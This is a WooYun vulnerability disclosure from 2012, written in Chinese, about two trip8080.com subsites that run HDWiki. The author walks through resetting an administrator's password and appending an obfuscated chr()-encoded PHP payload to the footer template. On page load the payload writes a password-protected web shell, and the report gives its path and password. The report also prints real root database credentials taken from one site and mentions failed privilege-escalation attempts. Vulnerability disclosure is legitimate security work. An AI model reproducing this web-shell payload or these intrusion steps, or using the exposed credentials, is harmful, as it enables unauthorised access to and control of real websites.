当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014681

漏洞标题:畅途网分站任意用户名密码修改及分站沦陷

相关厂商:畅途网

漏洞作者: 疯子

提交时间:2012-11-12 16:57

修复时间:2012-12-27 16:58

公开时间:2012-12-27 16:58

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-11-12: 细节已通知厂商并且等待厂商处理中
2012-11-14: 厂商已经确认,细节仅向厂商公开
2012-11-24: 细节向核心白帽子及相关领域专家公开
2012-12-04: 细节向普通白帽子公开
2012-12-14: 细节向实习白帽子公开
2012-12-27: 细节向公众公开

简要描述:

畅途网分站任意用户名密码修改及分站沦陷 我什么都没有动,只是想留个联系方式给你们,送点小礼物。

详细说明:

开始看到你们给风萧萧要了联系方式于是就关注了一下你们网站。
发现你们分站 百科和http://tuipiao.trip8080.com
这两个都是用的 HDWIKI 开始至是先看到 退票的这个。
然后http://www.wooyun.org/bug.php?action=view&id=6052
百度了一下 试了这个漏洞
可以修改密码
然后默认用户不是admin
找了一下 可以查看到用户
trip8080
用户就是这个 果断登陆成功
http://tuipiao.trip8080.com
tuipiao 密码修改为 123456
然后进去拿shell 方法也很简单
后台风格设置--编辑模板--高级编辑
选"页尾(footer.htm)",最后输入:
<?@eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));?>
刷新首页,即在data下生成一句话木马a.php,密码为cmd
shell也成功拿下

漏洞证明:

1.jpg


root密码也有 提权没搞下来。。

2.jpg


然后就看了看 绝对没动你们数据库。。。
然后利用数据库里面找到 baike这个网站的账号密码 然后进网站 然后哎 也提权不下来
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PW', 'zhangwei');
提权是没办法了。。有root 想用UDF提权 没提权进去 就来提交了。马儿你们用护卫神那个东西扫描一下就差不多 我没放什么后门。
求礼物

修复方案:

打补丁吧 亲

版权声明:转载请注明来源 疯子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-11-14 08:42

厂商回复:

非常感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2012-11-12 19:20 | Metasploit ( 实习白帽子 | Rank:37 漏洞数:7 | http://www.metasploit.cn/)

    @疯子 库藏哪里了?

  2. 2012-11-13 08:57 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @Metasploit ~.~妹的,斯巴达不敢动。